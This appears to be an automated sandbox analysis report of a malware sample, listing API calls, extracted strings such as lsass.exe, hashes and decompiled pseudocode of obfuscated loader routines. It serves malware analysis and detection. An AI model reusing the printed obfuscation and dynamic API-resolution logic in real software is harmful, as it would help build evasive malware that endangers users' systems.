                      0x00000000
                      0x00000000
                      0x00000000
                      0x004b0116
                      0x004b007d
                      0x00000000
                      0x004b007d
                      0x004b006c
                      0x004afe78
                      0x004afe78
                      0x00000000
                      0x004afe7b
                      0x004afe76

                      APIs
                      • CryptGetHashParam.ADVAPI32(?,00000002,?,?), ref: 004AFF57
                      • CryptDestroyHash.ADVAPI32(?,00000000,?,00000001,00000000,wuapi.dll,?), ref: 004B034D
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: CryptHash$DestroyParam
                      • String ID: HMETAFILEPICT_UserSize$Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.Resources.dll$NtPowerInformation$OSProvider.dll$System.Xml.XmlDocument.dll$Yf)$_isdel.exe$lsass.exe$mscpxl32.dLL$normaliz.dll$wG $wuapi.dll
                      • API String ID: 1393782385-3654168436
                      • Opcode ID: 45cfe202dc7e8c58852e1405462b7d1786453299d8915dfa52d70ad113504c83
                      • Instruction ID: 68b14b2c4468a07a9191b323ebc64f1ad8ee46526c47b202c1aa2b39c27e80b3
                      • Opcode Fuzzy Hash: 45cfe202dc7e8c58852e1405462b7d1786453299d8915dfa52d70ad113504c83
                      • Instruction Fuzzy Hash: 7A12BC75E4434A8FDB00DFB9EC982CE7BB1EB39310F08446AD944A7326E3790A49DB55
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 278 46db68-46db84 279 46db86-46db9e 278->279 280 46dba2-46dbaa 278->280 279->280 281 46dbac-46dbb7 280->281 282 46dbba-46dbd4 LoadLibraryA 280->282 281->282 283 46dbd6-46dbdd 282->283 284 46dbf3-46dc09 282->284 285 46dbdf-46dbec 283->285 286 46dc0b-46dc18 283->286 284->286 287 46dbee 285->287 288 46dc1f-46dc72 285->288 286->288 287->284 289 46dc74-46dc87 288->289 290 46dca5-46dcaa 288->290 291 46dca0 289->291 292 46dc89-46dc9e 289->292 293 46dcac-46dcb7 290->293 294 46dcbd-46dcff 290->294 291->290 292->291 293->294 295 46dd10-46dd21 294->295 296 46dd01-46dd09 294->296 296->295 297 46dd0b 296->297 297->295
                      APIs
                      • LoadLibraryA.KERNELBASE(?), ref: 0046DBC6
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: LibraryLoad
                      • String ID: RegDeleteKeyExW$WinFax.dll$api-ms-win-core-string-l1-1-0.dll$wuapi.dll
                      • API String ID: 1029625771-4165016147
                      • Opcode ID: eef2808c2eecf06cebdc7b8a2258de0b09de5736e07ad9d81aac6d6dc3525ae7
                      • Instruction ID: dd2f8b21f777de2ffc0e392a0a20a3262fa7c5ff35a77f3b9579320fd692dded
                      • Opcode Fuzzy Hash: eef2808c2eecf06cebdc7b8a2258de0b09de5736e07ad9d81aac6d6dc3525ae7
                      • Instruction Fuzzy Hash: 6F41AE75F103069FDB00AF79D9E82DE7BB1FB69310F48842AC9009732AE3340989DB55
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 310 4d272d-4d27c0 311 4d27d0-4d281b 310->311 312 4d27c2-4d27cd 310->312 313 4d281d-4d2828 311->313 314 4d2831-4d288c WriteFile 311->314 312->311 315 4d282c-4d282e 313->315 316 4d282a 313->316 315->314 316->315
                      APIs
                      • WriteFile.KERNELBASE(?,?,?,?), ref: 004D2847
                      Strings
                      • dpnet.dll, xrefs: 004D278A
                      • Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.Resources.dll, xrefs: 004D2753
                      • ucmhc.dll, xrefs: 004D2804
                      • G.V, xrefs: 004D2876
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: FileWrite
                      • String ID: G.V$Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.Resources.dll$dpnet.dll$ucmhc.dll
                      • API String ID: 3934441357-2877886047
                      • Opcode ID: 04ab278a087a12d1433b9ee1e379a332640db28b93b940c90da80b65bb5593e9
                      • Instruction ID: 4b8478ef53dea7fcf7c7aa7f8120348a068cb53e5b8837b35ac6c96b6ea15f9d
                      • Opcode Fuzzy Hash: 04ab278a087a12d1433b9ee1e379a332640db28b93b940c90da80b65bb5593e9
                      • Instruction Fuzzy Hash: FB4115B9E50309AFCF00DFA9D9D56DDBBB0EB28310F40806AE944E7351D2745A84DB44
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 405 46ce82-46cf08 406 46cf1f-46cf3c LoadLibraryA 405->406 407 46cf0a-46cf1a 405->407 407->406
                      APIs
                      • LoadLibraryA.KERNELBASE(?), ref: 0046CF21
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: LibraryLoad
                      • String ID: wuapi.dll
                      • API String ID: 1029625771-2797979843
                      • Opcode ID: 23b0f2297e9236c9d34dbf1247cefecadbe12954b2725eff082ce7cc5a4488b2
                      • Instruction ID: bdec6b5d9e8b2d99924f7a33a0c2e2d3546498d42ada7fff0a68cae79d638000
                      • Opcode Fuzzy Hash: 23b0f2297e9236c9d34dbf1247cefecadbe12954b2725eff082ce7cc5a4488b2
                      • Instruction Fuzzy Hash: C5113470F5420A9FDB00DFB8E8846DDBBB1EB6A724F0441699918E73A2E3B40949DB41
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 408 23e87c6-23e87df 409 23e87e1-23e87e3 408->409 410 23e87ea-23e87f6 CreateToolhelp32Snapshot 409->410 411 23e87e5 409->411 412 23e87f8-23e87fe 410->412 413 23e8806-23e8813 Module32First 410->413 411->410 412->413 420 23e8800-23e8804 412->420 414 23e881c-23e8824 413->414 415 23e8815-23e8816 call 23e8485 413->415 418 23e881b 415->418 418->414 420->409 420->413
                      APIs
                      • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 023E87EE
                      • Module32First.KERNEL32(00000000,00000224), ref: 023E880E
                      Memory Dump Source
                      • Source File: 00000005.00000002.464999094.00000000023E8000.00000040.00000800.00020000.00000000.sdmp, Offset: 023E8000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_23e8000_B87E.jbxd
                      Yara matches
                      Similarity
                      • API ID: CreateFirstModule32SnapshotToolhelp32
                      • String ID:
                      • API String ID: 3833638111-0
                      • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                      • Instruction ID: cc61f6cfc88c8c24e32eea9a53cb11f2ef3dc131a506dc2434f8a616833a649f
                      • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                      • Instruction Fuzzy Hash: 59F09631A007206FEB203BF5A88DB6E76E8EF49725F100528E653910D0DB70E8494A61
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • GetFileAttributesW.KERNELBASE ref: 004B0FC1
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: AttributesFile
                      • String ID:
                      • API String ID: 3188754299-0
                      • Opcode ID: ea58a405e0e64d76220aa99920a66b1d17324ea2a26ce2c55647758112df9357
                      • Instruction ID: e3fa7fa5c656face5c45343ba49ac4d476067e0fe277372c006e33e024eae605
                      • Opcode Fuzzy Hash: ea58a405e0e64d76220aa99920a66b1d17324ea2a26ce2c55647758112df9357
                      • Instruction Fuzzy Hash: 43C08CE46C030A3BEB00BA90DC89DEE2A2DF3A079A7600092B00052399E1ED0E0AC621
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 023E84D6
                      Memory Dump Source
                      • Source File: 00000005.00000002.464999094.00000000023E8000.00000040.00000800.00020000.00000000.sdmp, Offset: 023E8000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_23e8000_B87E.jbxd
                      Yara matches
                      Similarity
                      • API ID: AllocVirtual
                      • String ID:
                      • API String ID: 4275171209-0
                      • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                      • Instruction ID: 97df89b2b5c8da8d371074010e7a64a2550c0dd84c9582624b788322eaead317
                      • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                      • Instruction Fuzzy Hash: D1113C79A00208EFDB01DF98C985E99BBF5AF08350F058094F9499B3A1D771EA90DF80
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: AllocVirtual
                      • String ID:
                      • API String ID: 4275171209-0
                      • Opcode ID: 720bdd5f8cd7e541af80946f824cbe9d96bc3af9c2ff3d0fc841d06cc1575041
                      • Instruction ID: 02d7f321e7fdefe4bd1ed0070f40cb9c968c27eec82114a5b8485830186f0776
                      • Opcode Fuzzy Hash: 720bdd5f8cd7e541af80946f824cbe9d96bc3af9c2ff3d0fc841d06cc1575041
                      • Instruction Fuzzy Hash: 90E02B64D1024207EB006F79DA4C1CD3FB0EB3A328F451469C49097358C23900059F65
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E004AE906(intOrPtr _a4, intOrPtr _a8) {
                      				long _v8;
                      				CHAR* _v12;
                      				CHAR* _v16;
                      				CHAR* _t14;
                      
                      				_v16 = 0;
                      				_t14 = _a8 + _a8;
                      				_v8 = _t14;
                      				_v12 = _t14;
                      				E004A646A(_v12); // executed
                      				_v16 = _t14;
                      				E004AE896(_v16, _a4, _a8);
                      				CharUpperBuffA(_v16, _v8); // executed
                      				return _v16;
                      			}








                      APIs
                      • CharUpperBuffA.USER32(00000000,?,?), ref: 004AE93D
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: BuffCharUpper
                      • String ID:
                      • API String ID: 3964851224-0
                      • Opcode ID: f7aa4290a1d4c696bbc81596abc1dda2888b84ec69a4d61fca0ff3e4a580dcb1
                      • Instruction ID: 1da07d6b28ad723244748cd8f4b962ad1cc17d3ab7f28c4ff61efcb80d9f995b
                      • Opcode Fuzzy Hash: f7aa4290a1d4c696bbc81596abc1dda2888b84ec69a4d61fca0ff3e4a580dcb1
                      • Instruction Fuzzy Hash: B6F0AE35C00208BFCF01AFA9DC41A8CBBB1EF14318F10C1A5E924A6260D7368A64AF44
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00507020(int __edx) {
                      				void* _t1;
                      
                      				if(__edx != 0) {
                      					_t1 = malloc(__edx); // executed
                      					return _t1;
                      				} else {
                      					return 0;
                      				}
                      			}





                      APIs
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: malloc
                      • String ID:
                      • API String ID: 2803490479-0
                      • Opcode ID: e7e52364a65551d2f2e863f5fa4d91097504cf4f39efa7ba4035d1c28b1b6513
                      • Instruction ID: 843bc1800a2f380bf3025d0414cd7774c4182b6f6c8e25964212e7e79e675822
                      • Opcode Fuzzy Hash: e7e52364a65551d2f2e863f5fa4d91097504cf4f39efa7ba4035d1c28b1b6513
                      • Instruction Fuzzy Hash: 47A011CEE2008000EA082032280202B202232E0A0BBE8EAB8A800800A8FE3CE008200A
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 47%
                      			E0049BC94(void* __ebx, short __ecx, short __edx, void* __edi, void* __esi, void* __eflags) {
                      				signed char _t106;
                      				signed char _t108;
                      				signed char _t116;
                      				unsigned int _t119;
                      				signed char _t126;
                      				signed char _t132;
                      				signed char _t142;
                      				signed char _t144;
                      				signed char _t147;
                      				_Unknown_base(*)()* _t151;
                      				signed char _t159;
                      				unsigned int _t170;
                      				signed char _t189;
                      				intOrPtr _t205;
                      				signed char _t206;
                      				signed char _t216;
                      				intOrPtr _t233;
                      				intOrPtr _t260;
                      				short _t265;
                      				short _t266;
                      				short _t267;
                      				intOrPtr _t269;
                      				void* _t270;
                      				void* _t271;
                      				void* _t272;
                      				signed char _t274;
                      				void* _t276;
                      				signed char _t278;
                      				void* _t290;
                      				short _t296;
                      				signed int _t297;
                      				unsigned short _t300;
                      				signed short _t302;
                      				void* _t313;
                      				void* _t315;
                      				void* _t320;
                      				signed int _t322;
                      				void* _t324;
                      				signed short _t326;
                      				signed int _t329;
                      				signed short _t331;
                      				void* _t335;
                      				void* _t367;
                      
                      				_t324 = __esi;
                      				_t313 = __edi;
                      				_t296 = __edx;
                      				_t265 = __ecx;
                      				L00468D9F(__ebx, __edx, __edi, __esi, 1, 1);
                      				_t266 = _t265;
                      				_t106 =  *(_t335 - 8);
                      				if(_t106 >= 0x8d42f) {
                      					L4:
                      					 *0x5091d2 = _t296;
                      					_t297 = 0;
                      					 *0x509254 =  *0x509254 - _t324;
                      					 *0x50bf14 = _t106;
                      					_t159 = _t106;
                      					_push( *0x5090b6);
                      					 *0x50bf15 = _t106;
                      					_t315 = _t313 - 0xeb7d;
                      					 *0x509510 = _t106;
                      					if(_t106 != 0x1bb3) {
                      						L8:
                      						 *0x50bf14 =  *0x50bf14 - _t106;
                      						L9:
                      						_t324 = 0;
                      						 *(_t335 - 0x10) = "api-ms-win-core-namedpipe-l1-1-0.dll";
                      						L10:
                      						_t170 = "NtSetDriverEntryOrder";
                      						_t267 = 0;
                      						_push( *0x50914c);
                      						 *((intOrPtr*)(_t335 - 0x18)) = _t170;
                      						if(_t170 != _t170) {
                      							_t267 = 0x64c0;
                      							 *0x50917a = 0x64c0;
                      						}
                      						 *(_t335 - 8) = _t106;
                      						_t108 =  *(_t335 - 8);
                      						 *(_t335 - 0x10) = _t108;
                      						_push( *0x5090ec);
                      						if(_t267 < _t267) {
                      							L14:
                      							_t297 = _t297 + 0x8dbc12;
                      							 *0x50921c = _t297;
                      							goto L15;
                      						} else {
                      							_t267 = 0;
                      							if((_t297 & 0x0078854b) < 0) {
                      								L15:
                      								 *0x50bf14 = _t108;
                      								_push( *0x509062);
                      								 *0x50bf13 = _t108;
                      								_t326 = _t324 + _t324;
                      								if(_t315 + _t315 >= 0) {
                      									 *0x50bf17 = _t108;
                      									 *0x50bf17 = _t108;
                      									 *(_t335 - 0xc) = _t108;
                      								}
                      								 *(_t335 - 8) = _t108;
                      								 *0x50915a = _t267;
                      								_t269 =  *0x50915c; // 0x61a0
                      								_t270 = _t269 + 0x6e2043;
                      								 *0x5091c0 = _t297;
                      								_t116 =  *(_t335 - 8);
                      								_push( *0x509116);
                      								if(_t270 == _t270) {
                      									_t270 = 0x84c3;
                      									 *0x50a7c8 =  *0x50a7c8 - _t297;
                      									_t297 = _t297 - 0xa44d;
                      									if((_t326 & 0x0000ac2f) >= 0) {
                      										 *0x50bf13 = _t116;
                      									}
                      								}
                      								if(_t326 < 0) {
                      								}
                      								 *0x50bf17 = _t116;
                      								_push( *0x509158);
                      								 *(_t335 - 8) = _t116;
                      								if(_t116 + _t116 >= 0x28) {
                      									 *((intOrPtr*)(_t335 - 0x14)) =  *((intOrPtr*)(_t335 - 0x14)) - 0xdf042;
                      								}
                      								_t271 = _t270 + 1;
                      								 *0x50bf0e =  *0x50bf0e - _t271;
                      								_t272 = _t271 + _t271;
                      								_t299 = 0x8ebc;
                      								 *0x5091ea = 0x8ebc;
                      								_t119 = "normaliz.dll";
                      								if(_t119 >= 0x2506c7) {
                      									_t272 = _t272 - 0x64ab1b;
                      									 *0x50919e = 0x8ebc;
                      									_t299 = 0x9f8d;
                      									_t326 = 0;
                      									 *0x50bf15 = _t119 + 0xd2;
                      								}
                      								_t189 =  *(_t335 - 0xc);
                      								 *0x5090a0 =  *0x5090a0 - _t189;
                      								 *0x5090b8 =  *0x5090b8 + _t189;
                      								 *0x50908a =  *0x50908a + _t189 + _t189;
                      								_push( *0x5090ec);
                      								_t274 = _t272 + _t272 + 1;
                      								_t300 = _t299 >> _t274;
                      								_t126 =  *(_t335 - 8);
                      								if(0 < 0) {
                      									L30:
                      									 *0x509218 = _t300;
                      									_t326 = 0;
                      									goto L31;
                      								} else {
                      									_t290 = _t274 + 0x5423b0;
                      									if(_t290 < _t290 || _t290 < _t290) {
                      										_t300 =  *0x5091ca; // 0xa1e2
                      										goto L30;
                      									} else {
                      										L31:
                      										_push( *0x50902c);
                      										_t329 = _t326 + 0xbfe1de;
                      										_t320 = 0xfffffffffffe97ea;
                      										 *(_t335 - 8) = _t126;
                      										 *(_t335 - 0xc) = _t126;
                      										 *0x509154 =  *0x509154 + 0x60f2;
                      										_t132 =  *(_t335 - 8);
                      										if(0x512e >= 0x2b) {
                      											 *0x50bf0e =  *0x50bf0e + 0x42ac66;
                      											if(0x60f2 >= 0x60f2) {
                      												 *0x5091be = _t300;
                      											}
                      										}
                      										 *(_t335 - 8) = _t132;
                      										_push( *0x509174);
                      										_t205 = 0x50;
                      										_t276 = 0x5667;
                      										if("lsass.exe" < 0x2824) {
                      											_t205 =  *((intOrPtr*)(_t335 - 0x14));
                      											if(_t205 < _t205) {
                      												 *((intOrPtr*)(_t335 - 0x1c)) = _t205;
                      											}
                      											_t367 = _t276;
                      										}
                      										_t278 = 0x76fc;
                      										_t302 = 0xa111 >> 0x76fc;
                      										_t142 = E005002EA(_t205, 0x76fc, 0xa111 >> 0x76fc, _t320, _t367);
                      										 *0x50bf14 = _t142;
                      										_t206 =  *0x50bf15; // 0x0
                      										_t322 = _t320 - 0xd5b8cd >> 0x76fc;
                      										 *(_t335 - 8) = _t142;
                      										_t144 =  *(_t335 - 8);
                      										if(_t206 + _t142 <= 0x25e035) {
                      											L43:
                      											if(_t322 < 0x3da) {
                      												goto L45;
                      											}
                      											goto L44;
                      										} else {
                      											 *0x509124 = 0x76fc;
                      											_t278 = 0x73;
                      											 *0x50bf10 =  *0x50bf10 - 0x73;
                      											if(0x89 > 0) {
                      												L44:
                      												 *0x509040 =  *0x509040 - _t144;
                      												L45:
                      												 *(_t335 - 0xc) = _t144;
                      												L46:
                      												L47:
                      												 *(_t335 - 0x58) = _t144;
                      												 *(_t335 - 8) = _t144;
                      												L00468197(("ucmhc.dll" >> _t278) + ("ucmhc.dll" >> _t278), _t322, _t329, 1, 0);
                      												_t147 =  *(_t335 - 8);
                      												if(0x36d457 >= 0x36d457) {
                      													L50:
                      													_t329 = _t329 + 0xaf0abc;
                      													L51:
                      													 *0x50b95f =  *0x50b95f + _t329;
                      													 *0x50bf15 = _t147;
                      													L52:
                      													_push( *(_t335 - 0x58));
                      													if(_t147 <= 0x808) {
                      														L54:
                      														if(0x8152 != 0) {
                      															L63:
                      															_t331 =  !(_t329 + 0xa3b5d5);
                      															_push( *0x5093d4);
                      															_t216 = _t147;
                      															 *(_t335 - 8) = _t147;
                      															if(_t147 <= 0x1aef) {
                      																L69:
                      																 *0x50bf07 = _t147;
                      																 *((intOrPtr*)(_t335 - 0x1c)) =  *((intOrPtr*)(_t335 - 0x1c));
                      																 *(_t335 - 0x20) =  *(_t335 - 0x20) + _t278;
                      																L70:
                      																_t151 = GetProcAddress();
                      																if((_t331 & 0x0000b2d4) != 0) {
                      																	L73:
                      																	if((_t331 & 0x0000abfd) > 0) {
                      																	}
                      																	 *0x50965a =  *0x50965a - _t322;
                      																	L76:
                      																	 *0x509744 = _t151;
                      																	 *(_t335 - 8) = _t151;
                      																	 *(_t335 - 0x10) = 0x1dc7a2;
                      																	_push(0);
                      																	_push(0x3a10ab);
                      																	_push(E0049C36F);
                      																	_push(L00468D9F);
                      																	return 0x1dc7a2;
                      																}
                      																_t331 = _t331 + 0xca7b;
                      																 *0x50bf15 = _t151;
                      																if(_t322 < 0) {
                      																	goto L76;
                      																}
                      																 *(_t335 - 8) = _t151;
                      																goto L73;
                      															}
                      															_t233 = _t216 - 0x3296;
                      															if(_t233 != 0x347170) {
                      																goto L70;
                      															}
                      															 *((intOrPtr*)(_t335 - 0x1c)) = _t233;
                      															if(0x61e5 < 0x61e5) {
                      																goto L70;
                      															}
                      															_t278 = 0;
                      															if(0 < 0) {
                      																 *0x5091f2 =  *0x5091f2;
                      															}
                      															 *0x50bf14 = 0xcc;
                      															_t322 = _t322 + 0xd00321;
                      															_t147 = 0xf4;
                      															goto L69;
                      														}
                      														_t329 = 0xcd24;
                      														if((_t147 & _t147) < 0) {
                      															L62:
                      															goto L63;
                      														}
                      														if(_t322 >= 0) {
                      															L61:
                      															 *0x50a94c =  *0x50a94c + 0x873a;
                      															goto L62;
                      														}
                      														L58:
                      														 *0x5090d0 =  *0x5090d0 +  !( *(_t335 - 0xc) - 0x307f);
                      														if(_t278 >= _t278) {
                      															 *0x50916a = _t278;
                      														}
                      														goto L61;
                      													}
                      													 *(_t335 - 8) =  *(_t335 - 8) - _t147;
                      													 *(_t335 - 0x20) = _t278;
                      													_t278 = 0x6e87;
                      													 *0x50917e =  *0x50917e + 0x6e87;
                      													if((_t302 & 0x00008e11) != 0) {
                      														goto L58;
                      													}
                      													goto L54;
                      												}
                      												 *0x509192 = 0x648e;
                      												_t278 = 0xd8e1 + _t302;
                      												_t302 = _t302 + 0x849d2f;
                      												 *0x50bf11 =  *0x50bf11 + _t302;
                      												if((_t302 & 0x0000a3a1) < 0) {
                      													goto L52;
                      												}
                      												if((_t147 & 0x000000b6) >= 0) {
                      													goto L51;
                      												}
                      												goto L50;
                      											}
                      											_t302 = 0xa861;
                      											if((_t329 & 0x009e169b) != 0) {
                      												goto L47;
                      											}
                      											_t329 = _t329 - 0xb34d61;
                      											_t322 =  !_t322;
                      											if(_t144 >= 0) {
                      												goto L46;
                      											}
                      											goto L43;
                      										}
                      									}
                      								}
                      							}
                      							goto L14;
                      						}
                      					}
                      					_t260 = _t159 - 0xffffffffffd1f0ec;
                      					 *((intOrPtr*)(_t335 - 0x14)) = _t260;
                      					 *((intOrPtr*)(_t335 - 0x18)) = _t260;
                      					if(_t266 < _t266) {
                      						goto L10;
                      					}
                      					if(_t266 < _t266) {
                      						goto L9;
                      					}
                      					_t297 = 0x8a15;
                      					 *0x5091f4 = 0x8a15;
                      					goto L8;
                      				}
                      				 *((intOrPtr*)(_t335 - 0x14)) =  *(_t335 - 0xc) - 0x22 + 0x3144;
                      				if(0 > 0) {
                      					 *0x509154 = _t266;
                      				}
                      				_t266 =  *0x509184; // 0x875a
                      				goto L4;
                      			}

                      APIs
                      • GetProcAddress.KERNEL32(?,00000001), ref: 0049C2D1
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: AddressProc
                      • String ID: 5%$CNBP_335.DLL$CoLockObjectExternal$HMETAFILEPICT_UserSize$NtSetDriverEntryOrder$RtlReleaseRelativeName$TpCaptureCaller$WinFax.dll$aaclient.dll$api-ms-win-core-namedpipe-l1-1-0.dll$api-ms-win-core-string-l1-1-0.dll$dpnet.dll$lsass.exe$mscpxl32.dLL$normaliz.dll$pq4$ucmhc.dll$wuapi.dll$~s%$`}
                      • API String ID: 190572456-863654116
                      • Opcode ID: 629826b7226e4e9d1bc20083de35d664cd8bc5f485080b46df7a5a4c3f0e4930
                      • Instruction ID: 025a65e1e4ef756207230300738e2dc6a2e3dee9295441304cf7cffa52657546
                      • Opcode Fuzzy Hash: 629826b7226e4e9d1bc20083de35d664cd8bc5f485080b46df7a5a4c3f0e4930
                      • Instruction Fuzzy Hash: 8102ED75E402468BCB00DFB9E8D82CD7FB1EB3A314F48457AC944A7366E3380949DB95
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 69%
                      			E004E828B(void* __ebx, void* __ecx, void* __edx, void* __esi) {
                      				signed int _t128;
                      				signed int _t129;
                      				signed int _t132;
                      				signed int _t134;
                      				signed int _t137;
                      				signed int _t140;
                      				signed int _t142;
                      				signed int _t143;
                      				signed int _t145;
                      				signed int _t146;
                      				signed int _t147;
                      				intOrPtr _t156;
                      				intOrPtr _t162;
                      				char* _t180;
                      				signed int _t199;
                      				char* _t205;
                      				void* _t221;
                      				intOrPtr _t248;
                      				void* _t251;
                      				signed int _t252;
                      				intOrPtr _t257;
                      				signed int _t258;
                      				signed int _t301;
                      				signed int _t304;
                      				short _t305;
                      				signed int _t308;
                      				signed int _t309;
                      				signed int _t311;
                      				short _t314;
                      				signed int _t322;
                      				signed int _t340;
                      				short _t342;
                      				signed int _t343;
                      				signed int _t350;
                      				signed int _t352;
                      				void* _t361;
                      				short _t365;
                      				intOrPtr _t368;
                      				short _t373;
                      				signed int _t374;
                      				signed short _t386;
                      				intOrPtr* _t389;
                      				short _t390;
                      				signed int _t392;
                      				void* _t393;
                      				void* _t395;
                      				signed int _t399;
                      				short _t400;
                      				signed int _t401;
                      				signed int _t415;
                      				signed int _t418;
                      				void* _t419;
                      				void* _t435;
                      				void* _t436;
                      				signed short _t438;
                      				short _t439;
                      				signed int _t442;
                      				void* _t443;
                      				intOrPtr _t452;
                      				void* _t459;
                      
                      				 *0x5090ce =  *0x5090ce + __ebx;
                      				 *(_t459 - 0xc) =  *( *(_t459 - 0xc) + 0x24);
                      				_t162 =  *0x509d08; // 0x0
                      				 *0x50a060 = _t162;
                      				_t301 =  *(_t459 - 0xc);
                      				_t418 = _t301;
                      				 *(_t459 - 0xc) = _t301;
                      				 *(_t459 - 8) =  *(_t459 - 8) + _t418;
                      				 *0x509ff0 = 0x4515fe;
                      				_t304 =  *0x509160; // 0xeb4
                      				_t305 = _t304 - 0x7c56;
                      				 *0x5091ac = _t305;
                      				_t361 = 0xa3c2;
                      				 *0x509de0 = "OSProvider.dll";
                      				 *0x509166 = _t305;
                      				_t128 =  *(_t459 - 8);
                      				 *(_t459 - 0x2c) = _t128;
                      				_t308 =  *(_t459 - 0xc);
                      				 *(_t459 - 0x20) = 0xffffffff;
                      				 *(_t459 - 0xc) = _t308;
                      				if(_t308 > _t308) {
                      					 *0x50bf13 =  *0x50bf13 - _t128;
                      					 *0x50bf13 =  *0x50bf13 + _t128;
                      				}
                      				 *0x50bf15 =  *0x50bf15 + _t128;
                      				 *0x50bf17 = _t128;
                      				 *0x50bf17 = _t128;
                      				_t309 =  *(_t459 - 0xc);
                      				_t129 =  *(_t459 - 0x30);
                      				 *(_t459 - 8) = _t129;
                      				if(0x3f6052 >= 0x3f6052) {
                      					_t415 =  !(_t361 - _t309 - _t309 + 0xe40e);
                      					if((_t415 & 0x007f04a6) < 0) {
                      						_t415 = _t415 + 0x94d8d1;
                      						 *0x50bf13 = _t129;
                      						 *0x50bf15 = _t129;
                      						_t418 = _t418 + _t418;
                      						if(_t129 > 0) {
                      						}
                      					}
                      					 *0x509e14 = 0x322bad;
                      					_t361 = _t415 + _t309 + 0x673f;
                      					 *0x509180 = _t309;
                      				}
                      				 *(_t459 - 0xc) = _t309;
                      				 *(_t459 - 8) =  *( *(_t459 - 8) + 0x18);
                      				_t180 = 0x514453;
                      				_t132 =  *(_t459 - 8);
                      				_t311 =  *(_t459 - 0xc);
                      				 *(_t459 - 0x24) = _t132;
                      				 *0x50bf12 = _t132;
                      				_t419 = _t418 + 1;
                      				 *0x50bf15 = _t132;
